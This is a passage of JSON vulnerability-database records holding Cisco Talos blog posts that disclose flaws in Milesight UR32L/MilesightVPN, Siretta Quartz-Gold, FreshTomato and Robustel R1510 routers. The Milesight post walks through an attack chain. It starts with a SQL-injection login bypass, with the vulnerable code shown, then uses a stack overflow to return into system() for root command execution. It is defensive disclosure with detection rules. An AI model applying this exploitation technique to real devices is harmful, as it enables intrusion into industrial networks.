"TALOS-2019-0893", "TALOS-2020-1051", "TALOS-2020-1058", "TALOS-2020-1059", "TALOS-2020-1061", "TALOS-2020-1065", "TALOS-2020-1066", "TALOS-2020-1071", "TALOS-2020-1086", "TALOS-2020-1087", "TALOS-2021-1281", "TALOS-2021-1282", "TALOS-2021-1283", "TALOS-2021-1284", "TALOS-2021-1285", "TALOS-2021-1313", "TALOS-2021-1316", "TALOS-2021-1317", "TALOS-2021-1318", "TALOS-2021-1319", "TALOS-2021-1320", "TALOS-2021-1321", "TALOS-2021-1361", "TALOS-2022-1454", "TALOS-2022-1455", "TALOS-2022-1456", "TALOS-2022-1457", "TALOS-2022-1458", "TALOS-2022-1459", "TALOS-2022-1462", "TALOS-2022-1463", "TALOS-2022-1468", "TALOS-2022-1469", "TALOS-2022-1470", "TALOS-2022-1471", "TALOS-2022-1472", "TALOS-2022-1473", "TALOS-2022-1474", "TALOS-2022-1475", "TALOS-2022-1476", "TALOS-2022-1477", "TALOS-2022-1478", "TALOS-2022-1481", "TALOS-2022-1482", "TALOS-2022-1483", "TALOS-2022-1484", "TALOS-2022-1495", "TALOS-2022-1496", "TALOS-2022-1499", "TALOS-2022-1500", "TALOS-2022-1501", "TALOS-2022-1502", "TALOS-2022-1503", "TALOS-2022-1504", "TALOS-2022-1505", "TALOS-2022-1506", "TALOS-2022-1507", "TALOS-2022-1509", "TALOS-2022-1510", "TALOS-2022-1511", "TALOS-2022-1518", "TALOS-2022-1519", "TALOS-2022-1520", "TALOS-2022-1521", "TALOS-2022-1522", "TALOS-2022-1523", "TALOS-2022-1570", "TALOS-2022-1571", "TALOS-2022-1572", "TALOS-2022-1573", "TALOS-2022-1575", "TALOS-2022-1576", "TALOS-2022-1577", "TALOS-2022-1578", "TALOS-2022-1579", "TALOS-2022-1580", "TALOS-2022-1586", "TALOS-2022-1590", "TALOS-2022-1592", "TALOS-2022-1595", "TALOS-2022-1596", "TALOS-2022-1597", "TALOS-2022-1598", "TALOS-2022-1605", "TALOS-2022-1606", "TALOS-2022-1607", "TALOS-2022-1608", "TALOS-2022-1609", "TALOS-2022-1610", "TALOS-2022-1611", "TALOS-2022-1612", "TALOS-2022-1613", "TALOS-2022-1615", "TALOS-2022-1637", "TALOS-2022-1638", "TALOS-2022-1639", "TALOS-2022-1640", "TALOS-2022-1641", "TALOS-2022-1642", "TALOS-2023-1694", "TALOS-2023-1695", "TALOS-2023-1696", "TALOS-2023-1697", "TALOS-2023-1698", "TALOS-2023-1699", "TALOS-2023-1700", "TALOS-2023-1701", "TALOS-2023-1702", "TALOS-2023-1703", "TALOS-2023-1704", "TALOS-2023-1705", "TALOS-2023-1706", "TALOS-2023-1710", "TALOS-2023-1711", "TALOS-2023-1712", "TALOS-2023-1713", "TALOS-2023-1714", "TALOS-2023-1715", "TALOS-2023-1716", "TALOS-2023-1718", "TALOS-2023-1723"]}, {"type": "talosblog", "idList": ["TALOSBLOG:29DAF5785414A83AEFB51D866CCCA165", "TALOSBLOG:5249F941D38D1066B30BDEFF9C2C9F1B", "TALOSBLOG:57AE67D092003BFBA2D8AC2BAB81030D", "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "TALOSBLOG:6C4E58699BB90DB08778A81DD308563F", "TALOSBLOG:85B7EC75A8466C2794CC85DD62E3FDA3", "TALOSBLOG:91B7495CB321B7DE7F1C5325CBEC5490", "TALOSBLOG:BB780E8AC252593B415F668CD7BEBD82", "TALOSBLOG:C5180F1E61B3AFB5FC8CDD116ED91BB4", "TALOSBLOG:D359C8798DB4F71E8813CE20072A5C76", "TALOSBLOG:D8BE2B71060558D1F88AC6B123A6160E", "TALOSBLOG:DA58A7666C6D2C98A3062307E13300AA", "TALOSBLOG:F88EBAD7133FBE1A890AF58350AF7356"]}, {"type": "thn", "idList": ["THN:3CF746E3360C2F304DD3C6835409BDB4", "THN:4F054B1D96214D69BD4FF49AC6854672"]}, {"type": "threatpost", "idList": ["THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:4659C6740BE64D50B985F32560628891"]}, {"type": "zdt", "idList": ["1337DAY-ID-32607", "1337DAY-ID-32608", "1337DAY-ID-32609", "1337DAY-ID-32610", "1337DAY-ID-32611", "1337DAY-ID-32612", "1337DAY-ID-32613", "1337DAY-ID-32614", "1337DAY-ID-32615", "1337DAY-ID-32616", "1337DAY-ID-32617"]}]}, "score": {"value": 10.1, "vector": "NONE"}, "vulnersScore": 10.1}, "_state": {"dependencies": 1691358301, "score": 1698857807}, "_internal": {"score_hash": "7f678e8ea571d031ab2a138a3668ea05"}}

{"talosblog": [{"lastseen": "2023-07-25T19:26:27", "description": "* Cisco Talos discovered 17 vulnerabilities (63 CVEs) in the Milesight UR32L router and five vulnerabilities (six CVEs) in the Milesight MilesightVPN remote access solution software.\n * An attacker could exploit the vulnerabilities discovered to completely compromise the UR32L and MilesightVPN.\n * This post presents an attack scenario in which the UR32L is only reachable through the MilesightVPN remote access solution. The blog explains how an attacker could exploit the MilesightVPN and then fully compromise the UR32L.\n\n\nCisco Talos recently discovered several vulnerabilities in Milesight&#x27;s UR32L - an ARMv7 Linux-based industrial cellular router -- and Milesight&#x27;s MilesightVPN, a remote access solution for Milesight devices.\n\nIn all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs. Talos is disclosing these vulnerabilities despite no official fix from Milesight, in adherence to Cisco&#x27;s vulnerability disclosure policy. Milesight did not respond appropriately during the [90-day period as outlined in the policy](<https://sec.cloudapps.cisco.com/security/center/resources/security_vulnerability_policy.html>).\n\nThe MilesightVPN is the remote access solution for Milesight devices not directly exposed to the internet. The MilesightVPN will perform this through a VPN system, making the VPN setup for the devices and the administrator easy. The MilesightVPN provides an HTTP admin page to monitor devices&#x27; tunnel connection to the MilesightVPN itself and generate VPN configuration to join devices&#x27; VPNs. By default, the MilesightVPN binds the HTTP server ports and the one VPN port on all interfaces. This software must be installed on a server machine reachable by the administrator and devices. Because of this, the most popular setup for administrator is to expose the MilesightVPN to the internet.\n\nThe Milesight UR32L is an industrial router that offers cellular capabilities. The router supports multiple users with different permissions. It offers a shell with restricted capabilities access. And many common industrial router features and functionalities. The Milesight UR32L does not include the ability to obtain and act with root privileges.\n\n## Attack scenario overview\n\nIn this blog post, Talos will present an attack scenario in which an adversary targets the Milesight UR32L, where the router is not exposed to the internet and instead uses a VPN tunnel for providing access to its internal network and the router itself. We considered the scenario where the device is managed through MilesightVPN. This software must be installed on a machine that is reachable by the UR32L router and the administrator. For the purposes of this post, we assume the MilesightVPN server is exposed to the internet.\n\nMilesightVPN uses OpenVPN as the underlying VPN system. It is an excellent choice to use a well-established VPN system. OpenVPN is a well-known, tested VPN technology, which means it is less likely to have major security issues. But the MilesightVPN creates services around the OpenVPN tunnel like an HTTP server to monitor the connections and to generate OpenVPN configuration for joining the device&#x27;s VPN. By default, the MilesightVPN binds the HTTP server ports and the OpenVPN one on all interfaces. So, if the MilesightVPN is accessible on the internet, those services are by default accessible, too.\n\nThe UR32L has its own HTTP server; which allows users to manage the router configuration. We are also assuming the UR32L&#x27;s HTTP server is only accessible from the VPN and the MilesightVPN server is the only node that can generate a VPN configuration.\n\n_An illustration of the proposed attack scenario._\n\nThe graphic below includes only the vulnerabilities relevant to this proposed attack scenario. This graphic shows the steps that an attacker could take to obtain root access to a Milesight UR32L:\n\n\n\n## Attack walkthrough\n\nAfter locating the IP address of the MilesightVPN server, the attacker still cannot log in to the HTTP admin page due to the lack of valid credentials. The HTTP server login page of MilesightVPN looks like this:\n\n\n\nFrom this point, an attacker could exploit [TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>) (CVE-2023-22319) to bypass the login and access the admin web pages on MilesightVPN. This vulnerability is a SQL injection in the `_LoginAuth_` function responsible for checking the provided credentials. The check uses SQL without a prepared statement or any form of sanitization. The `_LoginAuth_` code is shown below:\n \n \n function LoginAuth(res,postdata,connection){ \n console.info('#######log.node:loginauth start'); \n var sha512=crypto.createHash('sha512'); \n sha512.update(postdata.pwd); \n var pwd=sha512.digest('hex'); \n [1] $sql=\"select * from user where user='\"+postdata.user+\"' and passwd='\"+pwd+\"'\"; \n [2] connection.query($sql).then(function(data){ \n var result={}; \n if(data['error']) \n { \n [...] \n } \n else \n { \n if(data['result'].length>0) \n { \n var dt=data['result']; \n result['status']=1; \n var token=generateToken(dt[0]['user']); \n var exp=new Date(\n new Date().getTime()+\n expiretime*1000).toUTCString(); \n res.setHeader('Set-Cookie',['token='+token]); \n console.info('#######log.node:loginauth success'); \n res.write(JSON.stringify(result)); \n res.end(); \n } \n else \n { \n [...] \n } \n } \n }); \n } \n \n\nAt `_[1]_`_,_ the function composes, the SQL query for checking if the username and password provided correspond to the one of an existing user. Then, at `_[2]_`, the query is executed, if the resulting table is not empty a JWT, corresponding to the first matched user, is crafted and placed in the response header as the value of `_Set-Cookie_`. This function is vulnerable to a SQL injection vulnerability because the &quot;preparation&quot; of the query string is performed through string concatenation instead of a prepared statement. This SQL injection can allow an attacker to bypass the authentication of the HTTP server and gain admin access.\n\nAfter bypassing the login page, an attacker would be presented with the following interface. The example below includes an interface with multiple devices registered and a single device that has an active connection.\n\n\n\nFrom here, an attacker can glean information about the devices connected to the server and their IPs. Furthermore, it is possible to obtain an OpenVPN configuration file to join the VPN tunnel and communicate with the devices that were previously unreachable. The attacker can now communicate with all devices in the VPN. The following image is the HTTP server login page of the Milesight UR32L router:\n\n\n\nFrom here, several attack paths are possible. [TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>) (CVE-2023-23902) is a pre-authentication stack-based buffer overflow that can lead to arbitrary remote code execution (RCE).\n\nThe attacker&#x27;s only requirement is to be able to communicate with the router&#x27;s HTTP server. This vulnerability is a pre-authentication, stack-based buffer overflow in the `_decrypt_string_` function of the `_uhttpd_` binary, the UR32L&#x27;s HTTP server binary. This function is responsible for decrypting the login password provided for the webpage login. The password sent from the browser is first AES-encrypted and then Base64-encoded. The `_decrypt_string_` will Base64 decode and then AES decrypt the password.\n\nThe `_uhttpd_` binary is not a Position Independent Executable (PIE), meaning that the binary is always loaded at the same virtual memory addresses, but the libraries are Position Independent Code (PIC). This makes it possible for an attacker to perform a code reuse attack using the binary code without any information leaks unless the attacker needs to reuse some of the libraries&#x27; code. Furthermore, the code reuse attack scenario is the path of least resistance for exploitation because no stack canary is used in this binary.\n\nThe binary is executed as root and makes use of functions such as `_system_` and `_popen_`, as such, one of the options would be to mount an attack aiming to execute OS commands.\n\nThe following is a code snippet of the_ _`_uhttpd_`_&#x27; _`_decrypt_string_`:\n \n \n void decrypt_string(\n char *b64_encrypted_password,\n char *decrypted_password,\n size_t size_decrypted_password)\n { \n [...] \n uchar stack_decrypted_string [72]; \n [... init the AES_key variable] \n [... init the AES_IV variable] \n [... calculate the __size variable value ...] \n base64_decoded_string_start = (uchar *)malloc(__size); \n [...] \n memset(base64_decoded_string_start,0,__size); \n processed_len = 0; \n base64_decode_string_cursor = base64_decoded_string_start; \n do { \n // this check allow to base64 decode the string before decrypting it \n if ((password_len_ - padding) <= processed_len) { \n *base64_decode_string_cursor = '\\0'; \n ctx = EVP_CIPHER_CTX_new(); \n [... check error ...] \n cipher_type = EVP_aes_128_cbc(); \n processed_len = EVP_DecryptInit_ex(\n ctx,\n cipher_type,\n (ENGINE *)0x0,\n AES_key,\n AES_IV); \n [... check error ...] \n [1] processed_len = EVP_DecryptUpdate(\n ctx,\n stack_decrypted_string,\n &output_len,\n base64_decoded_string_start,\n (base64_decode_string_cursor + \n (-1 - base64_decoded_string_start))); \n [... check error ...] \n processed_len = output_len; \n iVar3 = EVP_DecryptFinal_ex(\n ctx,\n stack_decrypted_string + output_len,&output_len); \n [... check error ...] \n processed_len = processed_len + output_len; \n EVP_CIPHER_CTX_free(ctx); \n stack_decrypted_string[processed_len] = '\\0'; \n EVP_cleanup(); \n ERR_free_strings(); \n free(base64_decoded_string_start); \n [2] strncpy(\n decrypted_password,\n (char*)stack_decrypted_string,\n size_decrypted_password); \n return; \n } \n [...] \n [3] \t[... base64 decode ...] \n } while( true ); \n } \n \n\nThis function has three parameters: the `_b64_encrypted_password_` parameter is the AES-encrypted and Base64-encoded password string that will be Base64 decoded and then AES decrypted; `_decrypted_password_` is the destination buffer where the decoded and decrypted password will be copied; `_size_decrypted_password_` is the size of the `_decrypted_password_` buffer. At `_[3]_` the `_b64_encrypted_password_` string is Base64 decoded and then, at `_[1]_`_,_ the decoded value is AES decrypted into `stack_decrypted_string`, a 72-byte long stack buffer. Eventually, at `_[2]_`_,_ `_size_decrypted_password_` bytes will be copied from the `_stack_decrypted_string_` buffer into the `decrypted_password` buffer.\n\nIn the `_decrypted_password_` only `_size_decrypted_password_` bytes will be copied, which will prevent any type of buffer overflow in the `_decrypted_password_` buffer.\n\nAt `_[1]_` the `_OpenSSL_`_&#x27;s _`_EVP_DecryptUpdate_` function will perform the AES decryption of the Base64 decoded user-controlled data into the `_stack_decrypted_string_` stack buffer. Because the `_stack_decrypted_string_` stack buffer is fixed in size and the decrypted string, provided by a user, can be greater in length than the stack buffer. This can lead to a buffer overflow in the `_stack_decrypted_string_` buffer.\n\nEssentially, the login API accepts the password as the Base64 encoding of the AES encryption of the password content. This function is used to decode the Base64 string and then AES decrypts it to obtain the actual password value. The vulnerability is that the password can overflow a stack buffer overwriting the stack content, including the stored return address.\n\nThe exploitation of this vulnerability becomes easier because of the epilogue of this function:\n \n \n strncpy(\n decrypted_password,\n (char*)stack_decrypted_string,\n size_decrypted_password); \n return; \n \n\nThe `_decrypted_password_` is a buffer in the function caller stack space where the decoded and decrypted password is saved. In assembly, this looks like:\n \n \n ldr r0, [sp,#0xc] \n bl strncpy \n add sp, sp, #0x84 \n pop {r4,r5,r6,r7,r8,r9,r10,r11,pc} \n \n\nThe function that copies the plain text password into the `_decrypted_password_` array, which is also the last function call before returning to the caller, is `_strncpy_`. The r0 register is used for passing the first argument of the function; in the case of `_strncpy_`, _r0_ points to the destination buffer. After the `_strncpy_` function call r0 will point to the beginning of the plaintext password.\n\nThe fact that the vulnerability considered is a stack buffer overflow, the binary does not have a stack canary, the binary is not PIE and uses the `_system_` function in combination with the fact that we control the content of what r0 points to, makes the exploitation straightforward. An attacker could overwrite the return address making the function return to the `_system_` function and controlling the executed shell command by placing the command to execute at the beginning of the plaintext password payload, as shown in the gdb screenshot below.\n\n\n\nThe `_pc_` is the last instruction of the `_decrypt_string_` function and the return address was overwritten with the `system` plt entry, know because the binary is not PIE, and the `_r0_` registry points to the `_controllable_` string. So, the `_decrypt_string_` returning will execute `_system(\"controllable\")_`.\n\n## Vulnerability Details\n\nThe following vulnerabilities are command injection issues in Milesight UR32L. These vulnerabilities exist in different functionalities of the router. An attacker could exploit these vulnerabilities by sending a specially crafted network packet to a targeted device:\n\n * [TALOS-2023-1694](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1694>) (CVE-2023-23550)\n * [TALOS-2023-1698](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1698>) (CVE-2023-22306)\n * [TALOS-2023-1699](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1699>) (CVE-2023-22659)\n * [TALOS-2023-1706](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1706>) (CVE-2023-24519 - CVE-2023-24520)\n * [TALOS-2023-1710](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1710>) (CVE-2023-24582 - CVE-2023-24583)\n * [TALOS-2023-1711](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1711>) (CVE-2023-22365)\n * [TALOS-2023-1712](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712>) (CVE-2023-22299)\n * [TALOS-2023-1713](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1713>) (CVE-2023-24595)\n * [TALOS-2023-1714](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1714>) (CVE-2023-22653)\n * [TALOS-2023-1723](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1723>) (CVE-2023-25582 - CVE-2023-25583)\n\nThere are also several vulnerabilities in the UR32L that could lead to a buffer overflow. An attacker could trigger these vulnerabilities by sending a specially crafted HTTP request or network request to the targeted device, depending on the specific vulnerability.\n\n * [TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>) (CVE-2023-23902)\n * [TALOS-2023-1715](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1715>) (CVE-2023-24018)\n * [TALOS-2023-1716](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1716>) (CVE-2023-25081 - CVE-2023-25124)\n * [TALOS-2023-1718](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1718>) (CVE-2023-24019)\n\n[TALOS-2023-1705](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1705>) (CVE-2023-23546) is a misconfiguration vulnerability in the Milesight UR32L that could lead to an attacker obtaining increased privileges on the device. The adversary, in this case, would need to carry out a man-in-the-middle attack to exploit this vulnerability.\n\nThere is also an access violation vulnerability -- [TALOS-2023-1696](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1696>) (CVE-2023-23571) -- that could lead to a denial-of-service if the attacker sends the device a specially crafted network request. [TALOS-2023-1695](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1695>) (CVE-2023-23547) can also be exploited with a specially crafted network request, but in this case, can lead to arbitrary file read.\n\nTalos also discovered five vulnerabilities in the MilesightVPN:\n\n * [TALOS-2023-1700](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1700>) (CVE-2023-22844): Authentication bypass vulnerability\n * [TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>) (CVE-2023-22319): SQL injection vulnerability\n * [TALOS-2023-1702](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1702>) (CVE-2023-23907): Directory traversal vulnerability\n * [TALOS-2023-1703](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1703>) (CVE-2023-22371): Command injection vulnerability\n * [TALOS-2023-1704](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1704>) (CVE-2023-24496 - CVE-2023-24497): Cross-site scripting vulnerability\n\n## Coverage\n\nThe following Snort rules will detect exploitation attempts against these vulnerabilities: 61206 - 61208, 61212, 61255 - 61258, 61266 - 61269, 61395 - 61397. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-06T15:38:19", "type": "talosblog", "title": "Taking over Milesight UR32L routers behind a VPN: 22 vulnerabilities and a full chain", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-22299", "CVE-2023-22306", "CVE-2023-22319", "CVE-2023-22365", "CVE-2023-22371", "CVE-2023-22653", "CVE-2023-22659", "CVE-2023-22844", "CVE-2023-23546", "CVE-2023-23547", "CVE-2023-23550", "CVE-2023-23571", "CVE-2023-23902", "CVE-2023-23907", "CVE-2023-24018", "CVE-2023-24019", "CVE-2023-24496", "CVE-2023-24497", "CVE-2023-24519", "CVE-2023-24520", "CVE-2023-24582", "CVE-2023-24583", "CVE-2023-24595", "CVE-2023-25081", "CVE-2023-25124", "CVE-2023-25582", "CVE-2023-25583"], "modified": "2023-07-06T15:38:19", "id": "TALOSBLOG:BB780E8AC252593B415F668CD7BEBD82", "href": "https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-02T20:12:34", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered several vulnerabilities in the Siretta Quartz-Gold router. Talos also discovered vulnerabilities in FreshTomato while investigating the Siretta router.\n\nThe Siretta Quartz-Gold is an industrial cellular router with several features and services, such as: SSH, UPNP, VPN, SNMP and many others. FreshTomato is an open source firmware based on Linux. The firmware offers several features for Broadcom-based routers.\n\n### Quartz-Gold Vulnerabilities\n\nSeveral OS command injection vulnerabilities were found which could lead to arbitrary command execution, making them all high risk. [TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>) (CVE-2022-40969) and [TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>) (CVE-2022-40220) can be triggered with HTTP requests, while [TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>) (CVE-2022-38066), [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) (CVE-2022-40222) and [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) (CVE-2022-42490-CVE-2022-42493) can each be triggered with a network request.\n\nThree directory traversals were recorded in QUARTZ-GOLD, [TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>) (CVE-2022-40701) and [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) (CVE-2022-41154), which can lead to arbitrary file deletion. Advisory 1637 has a higher CVSS risk rating and can be triggered by a network request. [TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>) (CVE-2022-38088) can lead to arbitrary file read.\n\nThree stack-based buffer overflows were found: [TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>) (CVE-2022-36279) and [TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>) (CVE-2022-38459) can lead to remote code execution, triggered by an HTTP request. [TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>) (CVE-2022-40985-CVE-2022-41030) can lead to arbitrary command execution and is triggered by a sequence of requests.\n\nA heap-based buffer overflow vulnerability was also reported in [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) (CVE-2022-41991), which can be triggered by a network request.\n\nTwo other vulnerabilities were discovered, including [TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>) (CVE-2022-38715), a leftover debug code that can lead to remote code execution, and [TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>) (CVE-2022-39045), a file write vulnerability that can lead to arbitrary file upload. Both can be triggered by HTTP requests.\n\n### FreshTomato Vulnerabilities\n\nIn FreshTomato, there is [TALOS-2022-1641](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1641>) (CVE-2022-42484), an OS command injection vulnerability and a directory traversal vulnerability, [TALOS-2022-1642](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1642>) (CVE-2022-38451). An attacker can send an HTTP request to trigger these vulnerabilities.\n\nCisco Talos worked with Siretta and FreshTomato to ensure that these issues were resolved and an update is available for affected customers, all in adherence to [Cisco&#x27;s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, FreshTomato 2022.5, Siretta QUARTZ-GOLD G5.0.1.5-210720-141020, AdvancedTomato commit 67273b0. Talos tested and confirmed these versions of Siretta and FreshTomato could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60649-60652, 60656-0664, 60667, 60692, 60721-60724, 60761-60763, 60771-60775, 60846-60847, 60914. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-26T21:26:14", "type": "talosblog", "title": "Vulnerability Spotlight: OS command injection, directory traversal and other vulnerabilities found in Siretta Quartz-Gold and FreshTomato", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-36279", "CVE-2022-38066", "CVE-2022-38088", "CVE-2022-38451", "CVE-2022-38459", "CVE-2022-38715", "CVE-2022-39045", "CVE-2022-40220", "CVE-2022-40222", "CVE-2022-40701", "CVE-2022-40969", "CVE-2022-40985", "CVE-2022-41030", "CVE-2022-41154", "CVE-2022-41991", "CVE-2022-42484", "CVE-2022-42490", "CVE-2022-42493"], "modified": "2023-01-26T21:26:14", "id": "TALOSBLOG:5A84CD5D3B3106E07A6CAFECDC1167F6", "href": "https://blog.talosintelligence.com/vulnerability-spotlight-os-command-injection-directory-traversal-and-other-vulnerabilities-found-in-siretta-quartz-gold-and-freshtomato/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-26T20:06:00", "description": "\n\n_Francesco Benvenuto of Cisco Talos discovered these vulnerabilities._\n\nCisco Talos recently discovered nine vulnerabilities in the Robustel R1510 industrial cellular router, several of which could allow an adversary to inject operating system code remotely.\n\nThe Robustel R1510 router is a dual-ethernet port wireless router that shares 3G and 4G wireless signals for use in industrial and internet-of-things environments. The router includes the use of open VPN tunneling, a cloud management platform to manage other devices and routers and different safeguards to manage data caps.\n\nTalos discovered five operating system command injection vulnerabilities in the router that an adversary could trigger by sending the targeted device a specially crafted network request. All these vulnerabilities have a CVSS severity score of 9.1 out of 10:\n\n * [TALOS-2022-1578](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1578>) (CVE-2022-34850)\n * [TALOS-2022-1577](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1577>) (CVE-2022-33150)\n * [TALOS-2022-1576](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1576>) (CVE-2022-32765)\n * [TALOS-2022-1573](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1573>) (CVE-2022-33325 - CVE-2022-33329)\n * [TALOS-2022-1572](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1572>) (CVE-2022-33312 - CVE-2022-33314)\n\n[TALOS-2022-1580](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1580>) (CVE-2022-34845) and [TALOS-2022-1570](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1570>) (CVE-2022-32585) can also lead to arbitrary code execution, though this vulnerability exists when a user logs in as an administrator.\n\nAn attacker could also send a specially crafted network request to trigger [TALOS-2022-1575](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1575>) (CVE-2022-35261 - CVE-2022-35271), a denial-of-service vulnerability in the device&#x27;s web server hashFirst functionality that could allow an adversary to crash the web server.\n\nAnother vulnerability, [TALOS-2022-1571](<https://talosintelligence.com/vulnerability_reports/TALOS-2022-1571>) (CVE-2022-28127) also exists in the web server on the device, but instead could be exploited to remove arbitrary files, even though a path traversal check is in place.\n\nCisco Talos worked with Robustel to ensure that these issues are resolved and an update is available for affected customers, all in adherence to [Cisco&#x27;s vulnerability disclosure policy](<https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html>).\n\nUsers are encouraged to update these affected products as soon as possible: Robustel R1510, version 3.3.0 and 3.1.16. Talos tested and confirmed these versions of the router could be exploited by these vulnerabilities.\n\nThe following Snort rules will detect exploitation attempts against this vulnerability: 60007 - 60035, 60388-60391, 60393 and 60455. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T19:33:00", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple issues in Robustel R1510 cellular router could lead to code execution, denial of service", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": 